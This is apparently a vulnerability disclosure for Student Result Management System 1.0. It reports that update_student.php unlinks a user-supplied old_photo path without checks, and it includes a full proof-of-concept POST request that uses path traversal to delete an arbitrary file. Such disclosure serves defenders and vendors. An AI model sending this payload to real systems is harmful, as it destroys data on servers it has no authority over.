BUG_Author: s0l42

Affected Version: Student Result Management System≤ 1.0

Vendor: SRMS

Software: SRMS

Vulnerability Files:

Description:

Improper unlink used in update_student.php, the system use unlink to delete old photo without any check. Attacker can use a path traversal to delete all the file in file system.

image.png

To proof the vulnerability, we create a file ~/testrm/2

image.png

Modify the field old_photo in http request as the target file

image.png

The file 2 is deleted by this request.

image.png

PoC

POST /admin/core/update_student HTTP/1.1
Host: xxx
Content-Length: 5981
Cache-Control: max-age=0
Origin: xxx
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryucb787jD97VDO0Ub
Upgrade-Insecure-Requests: 1
User-Agent: xxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: xxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: xxx
Connection: keep-alive

------WebKitFormBoundaryucb787jD97VDO0Ub
Content-Disposition: form-data; name="fname"

ALLY
------WebKitFormBoundaryucb787jD97VDO0Ub
Content-Disposition: form-data; name="mname"

ZUBERI
------WebKitFormBoundaryucb787jD97VDO0Ub
Content-Disposition: form-data; name="lname"

ALLY
------WebKitFormBoundaryucb787jD97VDO0Ub
Content-Disposition: form-data; name="gender"

Male
------WebKitFormBoundaryucb787jD97VDO0Ub
Content-Disposition: form-data; name="class"

4
------WebKitFormBoundaryucb787jD97VDO0Ub
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundaryucb787jD97VDO0Ub
Content-Disposition: form-data; name="image"; filename="OIP-C.jpg"
Content-Type: image/jpeg

<binary img file>
------WebKitFormBoundaryucb787jD97VDO0Ub
Content-Disposition: form-data; name="old_photo"

../../../../../home/xxx/testrm/2 (<the target file path>)
------WebKitFormBoundaryucb787jD97VDO0Ub
Content-Disposition: form-data; name="id"

RG007
------WebKitFormBoundaryucb787jD97VDO0Ub--